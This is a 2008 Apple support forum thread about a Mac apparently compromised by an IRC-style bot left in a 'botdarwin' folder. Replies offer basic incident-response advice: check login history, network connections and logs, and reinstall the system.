1464 Views 9 Replies Latest reply: Dec 2, 2008 11:23 AM by edclange
austin m wrote:
I noticed today after being out of town for the holidays that my password was no longer working when trying to administer things... I ended up having to log in as root and reset the password for my other accounts.
i also noticed in moving through the finder that in my home folder there was now an unnamed folder and inside is a folder named "botdarwin"
upon checking my bash history i discovered quite a few terminal commands had been run also.
any of the terminal guys able to decipher exactly what they were trying to accomplish?
i have a screen shot of the folder structure as well as a list of terminal commands that were executed here:
I'm not sure what the attack vector was because other people have access to my computer. I'll be thoroughly quizzing them later today.
When you do find out who did this, perhaps its time to stop letting other people use your computer and certainly never give them your administrator account password.
Clearly this is not a Leopard or OS problem, but one of a security breach on your part.
Prevention is the first step. Lock down your computer securely.
It's not a trojan bot, it's lack of security. The problem did not come in via the network, but via some user's fingers.
Message was edited by: nerowolfe
so after talking to the other user of my comp, they insist that they didn't download or install anything.
that said i did have some ports open to the internet, but my router wasn't properly configured for them to be accessible from the internet. i had SSH, web sharing, print sharing, and remote management turned on. i know for a fact it wasn't accessible because i couldn't ssh in or vpn in whilst i was out of town.
I found this at darwin bots dot com
Darwinbots is an open source artificial life simulator which attempts to simulate artificial life and evolution. It simulates Von Neuman Machines (and Von Neumann probes like the Monolith) better than it simulates biological life necessarily.
Darwinbots is an Artificial Life simulator that merges the gameplay of C-Robots type arena combat with adaptive asexual population dynamics.
Have you downloaded a game or something similar?
Is there anything interesting in the output of the "last" command (in Terminal)?
If it's an IRC bot, and it's still running, you might be able to figure out what IRC server and channel it's using with the "netstat -a" command in Terminal. This will show all of the established TCP connections on your machine.
If your intruder's trail is in your shell history, chances are there are other trails. Poke around in the Console application, or the files in /var/log.
There's a sendmail executable in your screen capture. This means that the bot has the capability of sending e-mail. That could be bad news.
Bottom line is, your machine has been compromised. You should wipe it clean and reinstall it from scratch.